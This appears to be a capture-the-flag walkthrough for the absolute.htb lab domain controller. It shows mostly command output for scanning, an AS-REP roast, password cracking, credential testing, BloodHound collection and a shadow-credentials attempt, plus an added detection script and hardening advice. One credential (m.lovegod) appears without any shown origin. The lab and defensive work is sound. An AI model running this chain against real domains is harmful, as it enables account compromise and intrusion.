[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.181:53
Open 10.10.11.181:80
Open 10.10.11.181:88
Open 10.10.11.181:135
Open 10.10.11.181:139
Open 10.10.11.181:389
Open 10.10.11.181:445
Open 10.10.11.181:464
Open 10.10.11.181:593
Open 10.10.11.181:636
Open 10.10.11.181:3268
Open 10.10.11.181:3269
Open 10.10.11.181:9389
Open 10.10.11.181:5985
Open 10.10.11.181:47001
Open 10.10.11.181:49664
Open 10.10.11.181:49665
Open 10.10.11.181:49666
Open 10.10.11.181:49667
Open 10.10.11.181:49674
Open 10.10.11.181:49671
Open 10.10.11.181:49675
Open 10.10.11.181:49679
Open 10.10.11.181:49685
Open 10.10.11.181:49703
Open 10.10.11.181:49722
SMB service
smbclient -L //10.10.11.181
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
SMB gives nothing useful: anonymous login succeeds but no shares are listed.
HTTP service
The site is a static page and directory scanning also turns up nothing useful, so the next step is to download the six images from the site's carousel and inspect their metadata.
for i in {1..6};do wget http://10.10.11.181/images/hero_$i.jpg;done
exiftool *.jpg | grep Author | awk -F' ' '{print $3" "$4}' > name.txt

James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
impacket-GetNPUsers -usersfile users.txt -dc-ip 10.10.11.181 -format john absolute.htb/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

...[snip]...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$d.klay@ABSOLUTE.HTB:18530e0c59304e8b5d667ac0cf0efa8a$ed41890599de622a5cf7808aef24c8272c03a5fb62a14b9de3f987e2f9ecc614fe22d44e7eba318ab44152271b84577844980b33e7b78ed0f9b36ebe43b4a6cc5339ecbef110e6325a4acb9d7661b4db47a609eccf7b13c53f9d1aa710a0220102bed90c8b8ee8c8319b9297d811d6c878cd9fca0e24646d82ac6c9d77b9aaf2b40ed8b9ef0c103166c3be1113daa285fca49a2dcba3dbae9d92cafeb6b7774bbd58982eaec5d712f744a281f2317b491555fcc7d58a8ed4c89d435a488b8e7df5c07d181007c5aeb3bd9c3dbb44bf896e9cdfc57509eeea3e7f76ff3d87a87cd7825e1f82e6f8724f9ba348
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...[snip]...
One AS-REP hash comes back, for d.klay, whose account does not require Kerberos pre-authentication. Save it to a file named hash and crack it with john.
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Darkmoonsky248girl ($krb5asrep$d.klay@ABSOLUTE.HTB)
1g 0:00:00:32 DONE (2025-03-25 03:27) 0.03097g/s 348137p/s 348137c/s 348137C/s DarrenCahppell..DarkAngelNinjaHaku
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
This yields a valid set of domain credentials:
username: d.klay
password: Darkmoonsky248girl
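From the defender's side, the whole chain above (a wordlist of guessed usernames thrown at the KDC, followed by an AS-REP handed out for the one account with pre-authentication disabled) leaves a distinctive footprint in the domain controller's Security log as event 4768 (a Kerberos TGT was requested). The following is an added example of that detection logic, not part of the original writeup: it runs over a constructed sample of parsed 4768 records (the field semantics are real Windows audit semantics; the hostnames, source IP 10.10.14.5 and event values are made up for the example) and flags both the enumeration burst and the roastable account.

```python
"""Detect the two stages of an AS-REP roast in Windows Security event 4768 data.

Added example (not from the writeup). Field semantics used here are the
documented ones for event 4768:
  Status "0x6"                   -> KDC_ERR_C_PRINCIPAL_UNKNOWN (no such account)
  PreAuthType "0"                -> TGT request made without pre-authentication
  TicketEncryptionType "0x17"    -> RC4-HMAC (fast to crack offline), "0x12" -> AES256
"""
from collections import Counter

# Constructed sample: what a SIEM would hand over after parsing 4768 events.
SAMPLE_EVENTS = (
    # Stage 1: a burst of guessed usernames from one source that do not exist in AD.
    # Failed 4768 audits carry "-" / 0xffffffff in the pre-auth and etype fields.
    [{"EventID": 4768, "TargetUserName": u, "IpAddress": "10.10.14.5",
      "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"}
     for u in ("jroberts", "j.roberts", "mchaffrey", "m.chaffrey", "dklay", "s.osvald")]
    + [
        # Stage 2: the account with pre-auth disabled answers with an RC4 AS-REP.
        {"EventID": 4768, "TargetUserName": "d.klay", "IpAddress": "10.10.14.5",
         "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
        # A normal, pre-authenticated AES logon: must not be flagged.
        {"EventID": 4768, "TargetUserName": "m.lovegod", "IpAddress": "10.10.11.50",
         "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
        # A single typo from another host: below the burst threshold, not flagged.
        {"EventID": 4768, "TargetUserName": "m.lovegood", "IpAddress": "10.10.11.50",
         "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    ]
)


def find_asrep_roastable(events):
    """Return {user: etype} for successful TGT requests made without pre-auth.

    Any such account hands an offline-crackable blob to whoever asks; an RC4
    etype (0x17) is the cheap-to-crack case seen in the john run above.
    """
    hits = {}
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == "0":
            hits[e["TargetUserName"]] = e["TicketEncryptionType"]
    return hits


def find_enumeration_sources(events, threshold=5):
    """Return {source_ip: count} for hosts that caused >= threshold
    KDC_ERR_C_PRINCIPAL_UNKNOWN failures: the footprint of a username list
    being fed to the KDC (GetNPUsers with -usersfile produces exactly this)."""
    unknown = Counter(e["IpAddress"] for e in events
                      if e["EventID"] == 4768 and e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}


def report(events):
    """Human-readable findings, one line each, in the order an analyst wants them."""
    lines = []
    for ip, n in find_enumeration_sources(events).items():
        lines.append(f"user enumeration: {ip} caused {n} unknown-principal failures")
    for user, etype in find_asrep_roastable(events).items():
        weak = " (RC4: crackable offline with a wordlist)" if etype == "0x17" else ""
        lines.append(f"AS-REP roastable account: {user}, etype {etype}{weak}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_EVENTS):
        print(line)
```

The fix on the directory side is the usual one: clear the "Do not require Kerberos preauthentication" flag on any account the first check reports, and drop RC4 from the account's supported encryption types so that even a remaining AS-REP is the slow PBKDF2/AES kind john identified as etype 17/18.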
Back to SMB
Enumerate with netexec, testing the credentials against each service:
netexec winrm 10.10.11.181 -u d.klay -p Darkmoonsky248girl
WINRM       10.10.11.181    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:absolute.htb)
WINRM       10.10.11.181    5985   DC               [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.181    389    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB         10.10.11.181    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.181    445    DC               [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION
bloodhound-python -ns 10.10.11.181 --dns-tcp -d absolute.htb -u m.lovegod -p AbsoluteLDAP2022! -k -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: absolute.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250326005117_bloodhound.zip
certipy-ad shadow auto -k -username m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!' -account winrm_user -target dc.absolute.htb -dc-ip 10.10.11.181
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22e415af-e00b-59e5-9462-693c3948067e'
[*] Adding Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': None